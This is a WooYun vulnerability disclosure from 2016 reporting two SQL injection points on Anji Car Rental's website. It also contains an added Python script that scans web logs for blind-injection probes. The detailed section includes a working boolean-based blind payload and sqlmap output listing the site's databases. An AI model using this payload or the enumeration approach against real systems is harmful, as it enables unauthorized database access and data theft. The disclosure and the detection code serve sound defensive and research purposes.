
Vulnerability summary

Defect ID: wooyun-2016-0168412

Title: Two SQL injection points on the main site of Anji Car Rental (安吉汽车租赁)

Affected vendor: 安吉汽车租赁有限公司 (Anji Car Rental Co., Ltd.)

Reporter: 头晕脑壳疼

Submitted: 2016-01-11 18:26

Fixed: 2016-02-27 11:49

Published: 2016-02-27 11:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-11: Details reported to the vendor; awaiting vendor handling
2016-01-15: Vendor confirmed; details visible to the vendor only
2016-01-25: Details disclosed to core white hats and domain experts
2016-02-04: Details disclosed to regular white hats
2016-02-14: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public

Brief description:

I'm here for a first find.

Detailed description:

First injection point: http://**.**.**.**/Web/RentalNoticeDetail.aspx?CountryCode=AU&CountryName=Australia
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://**.**.**.**:80/Web/RentalNoticeDetail.aspx?CountryCode=AU' AND 3737=3737 AND 'KGts'='KGts&CountryName=Australia
---
[14:42:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[14:42:43] [INFO] fetching database names
[14:42:43] [INFO] fetching number of databases
[14:42:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:42:43] [INFO] retrieved:
[14:42:44] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[14:42:44] [ERROR] unable to retrieve the number of databases
[14:42:44] [INFO] resumed: AvisOutBound
[14:42:44] [INFO] resumed: master
[14:42:44] [INFO] resumed: tempdb
[14:42:44] [INFO] resumed: model
[14:42:44] [INFO] resumed: msdb
[14:42:44] [INFO] resumed: Anji_eBiz
[14:42:44] [INFO] resumed: Anji_eBiz_UAT
[14:42:44] [INFO] resumed: AvisOutBound
[14:42:44] [INFO] resumed: Anji_eBiz_Inte
[14:42:44] [INFO] resumed: AnjiInt_DB
[14:42:44] [INFO] resumed: Anji_eBiz_Help
[14:42:44] [INFO] resumed: AvisCRM
[14:42:44] [INFO] resumed: Anji_eBiz150101
[14:42:44] [INFO] resumed: AvisOutBound_MobileTest
[14:42:44] [INFO] resumed:
available databases [13]:
[*] Anji_eBiz
[*] Anji_eBiz150101
[*] Anji_eBiz_Help
[*] Anji_eBiz_Inte
[*] Anji_eBiz_UAT
[*] AnjiInt_DB
[*] AvisCRM
[*] AvisOutBound
[*] AvisOutBound_MobileTest
[*] master
[*] model
[*] msdb
[*] tempdb
Second injection point: POST injection via the map.html search form (sqlmap was run against http://**.**.**.**/map.html?ID=8&CityName=310100 with the form's __VIEWSTATE, __EVENTVALIDATION and txtOffer* search fields supplied as the POST body).




Due to time constraints I did not dump any data; proving that the vulnerability exists is sufficient.
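The boolean-based blind payload in the sqlmap output above (a quote that closes the string literal, then AND with a numeric comparison) leaves a recognisable pair of true/false conditions in the web server log, which is what a defender can hunt for. The following is an added example, not from the report: a small Python scan over constructed IIS W3C log lines (default field order assumed) that flags a parameter once one client has sent it both a true and a false comparison.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (not from the report), default field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
SAMPLE_LOG = """\
2016-01-11 14:42:43 10.0.0.5 GET /Web/RentalNoticeDetail.aspx CountryCode=AU&CountryName=Australia 80 - 203.0.113.7 sqlmap/1.0 200
2016-01-11 14:42:43 10.0.0.5 GET /Web/RentalNoticeDetail.aspx CountryCode=AU'+AND+3737%3D3737+AND+'KGts'%3D'KGts&CountryName=Australia 80 - 203.0.113.7 sqlmap/1.0 200
2016-01-11 14:42:44 10.0.0.5 GET /Web/RentalNoticeDetail.aspx CountryCode=AU'+AND+3737%3D3738+AND+'KGts'%3D'KGts&CountryName=Australia 80 - 203.0.113.7 sqlmap/1.0 200
2016-01-11 14:42:50 10.0.0.5 GET /map.html ID=8&CityName=310100 80 - 198.51.100.9 Mozilla/5.0 200
"""

# A quote that breaks out of the string literal, then AND/OR with a numeric comparison:
# the shape of the report's payload (AU' AND 3737=3737 AND 'KGts'='KGts).
BOOLEAN_PROBE = re.compile(r"""['"]\s*(?:and|or)\s+(\d+)\s*=\s*(\d+)""", re.IGNORECASE)

def parse_query(raw_query):
    """Split an IIS cs-uri-query field into URL-decoded name -> value pairs ('-' means empty)."""
    params = {}
    if raw_query in ("", "-"):
        return params
    for pair in raw_query.split("&"):
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(value)
    return params

def find_blind_probes(log_text):
    """Tally true and false comparisons per (client, uri-stem, parameter)."""
    tally = {}
    for line in log_text.splitlines():
        fields = line.split(" ")
        if not line or line.startswith("#") or len(fields) < 11:
            continue  # skip W3C header/comment lines and truncated records
        stem, query, client = fields[4], fields[5], fields[8]
        for name, value in parse_query(query).items():
            m = BOOLEAN_PROBE.search(value)
            if not m:
                continue
            bucket = tally.setdefault((client, stem, name), {"true": 0, "false": 0})
            bucket["true" if m.group(1) == m.group(2) else "false"] += 1
    return tally

def suspected_injection_points(log_text):
    """A parameter that received both a true and a false condition from one client is being
    enumerated blind; that pair is the signature of boolean-based extraction, not a one-off hit."""
    return sorted(key for key, counts in find_blind_probes(log_text).items()
                  if counts["true"] and counts["false"])
```

On the sample, only the CountryCode parameter of RentalNoticeDetail.aspx is reported; the plain visit to map.html is not. Feed the function a real W3C log file's text to run it against production data.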

Proof of vulnerability: (identical to the detailed description above)


Fix recommendation:

Copyright notice: please credit the source when reposting: 头晕脑壳疼@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-01-15 15:55

Vendor reply:

CNVD confirmed and reproduced the reported issue, and has notified the site operator by e-mail through its publicly listed contact channel; the operator will provide a fix.

Latest status:

None yet